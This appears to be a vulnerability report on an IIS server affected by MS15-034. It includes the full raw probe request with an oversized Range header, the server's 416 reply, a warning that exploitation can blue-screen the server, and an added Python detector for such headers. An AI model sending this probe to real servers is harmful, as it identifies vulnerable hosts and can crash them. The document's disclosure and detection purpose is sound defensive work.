Vulnerable URL: http://.../favicon.ico
HTTP request:
GET /favicon.ico HTTP/1.1
Range: bytes=0-18446744073709551615
Connection: keep-alive
Cookie: %BA%D7%B1%DA%CA%D0%D7%DC%B9%A4%BB%E1=ViewUrl=%2FE%5FReadNews%2Easp%3FNewsID%3D2062;ASPSESSIONIDQCDTSTBB=EAIDCICCNMKMENPBHPNNILNL
Accept: */*
Accept-Encoding: gzip,deflate
Host: ***.***.***.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Content-Length: 2
HTTP response:
HTTP/1.1 416 Requested Range Not Satisfiable
Content-Type: image/x-icon
Last-Modified: Mon, 01 Jun 2015 12:16:07 GMT
Accept-Ranges: bytes
ETag: "201a44bd649cd01:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 20 Feb 2019 07:14:25 GMT
Content-Length: 362
Content-Range: bytes */1150
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>Requested Range Not Satisfiable</TITLE>
<meta HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD>
<BODY><h2>Requested Range Not Satisfiable</h2>
<hr><p>HTTP Error 416. The requested range is not satisfiable.</p>
</BODY></HTML>

Range: bytes=0-18446744073709551615
The site runs on IIS, and the installed version is affected by the remote code execution vulnerability MS15-034. Exploiting it can easily crash the server with a blue screen. Send the test request above; if the server replies "Requested Range Not Satisfiable", the vulnerability is present.
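The probe above is a single HTTP request whose only unusual feature is a `Range` header with a byte offset that no real file could have. From the defender's side that makes it easy to spot in a proxy, WAF or full-request capture. The following added example (not code from the report or from any vendor tool) parses a raw HTTP/1.1 request, extracts the `Range` header and flags any byte-range spec whose offset does not fit in 32 bits, which covers the 18446744073709551615 value used in the test. The sample requests, the `example.invalid` host and the 32-bit threshold are constructed assumptions for this example, not values from the page.

```python
import re
from typing import Dict, List, Optional

# Constructed sample requests for this example; the host is a placeholder,
# not the target host from the report.
NORMAL_REQUEST = (
    "GET /favicon.ico HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Range: bytes=0-1023\r\n"
    "\r\n"
)
PROBE_REQUEST = (
    "GET /favicon.ico HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "Range: bytes=0-18446744073709551615\r\n"
    "\r\n"
)

# Detection threshold (assumption): any byte offset that does not fit in
# 32 bits is far beyond any static file IIS would serve and matches the
# 2^64-1 value in the probe. Tune it for your environment.
MAX_SANE_OFFSET = 0xFFFFFFFF

# One byte-range spec as defined by HTTP: "first-last", "first-" or "-suffix".
_RANGE_SPEC = re.compile(r"^\s*(\d*)\s*-\s*(\d*)\s*$")


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP/1.1 request into a lower-cased header map."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")[1:]  # drop the request line
    headers: Dict[str, str] = {}
    for line in lines:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def suspicious_range_specs(range_value: str) -> List[str]:
    """Return every byte-range spec in a Range header value whose offset exceeds MAX_SANE_OFFSET."""
    if not range_value.lower().startswith("bytes="):
        return []  # only byte ranges are relevant to this check
    hits: List[str] = []
    for spec in range_value[len("bytes="):].split(","):
        m = _RANGE_SPEC.match(spec)
        if not m:
            continue  # malformed spec; the server will reject it on its own
        for number in m.groups():
            if number and int(number) > MAX_SANE_OFFSET:
                hits.append(spec.strip())
                break
    return hits


def inspect_request(raw_request: str) -> Optional[str]:
    """Return a finding string if the request carries an oversized Range header, else None."""
    headers = parse_headers(raw_request)
    range_value = headers.get("range")
    if range_value is None:
        return None
    hits = suspicious_range_specs(range_value)
    if not hits:
        return None
    return "oversized Range header (possible MS15-034 probe): " + ", ".join(hits)


if __name__ == "__main__":
    for label, request in (("normal", NORMAL_REQUEST), ("probe", PROBE_REQUEST)):
        print(label, "->", inspect_request(request))
```

Run against the two constructed requests, the normal `Range: bytes=0-1023` produces no finding while the probe is reported. The check is deliberately independent of the response code: the 416 in the capture above tells you the server still parsed the header, but from the defender's side the request itself is the signal worth alerting on, and the lasting fix is applying the MS15-034 update to the IIS host.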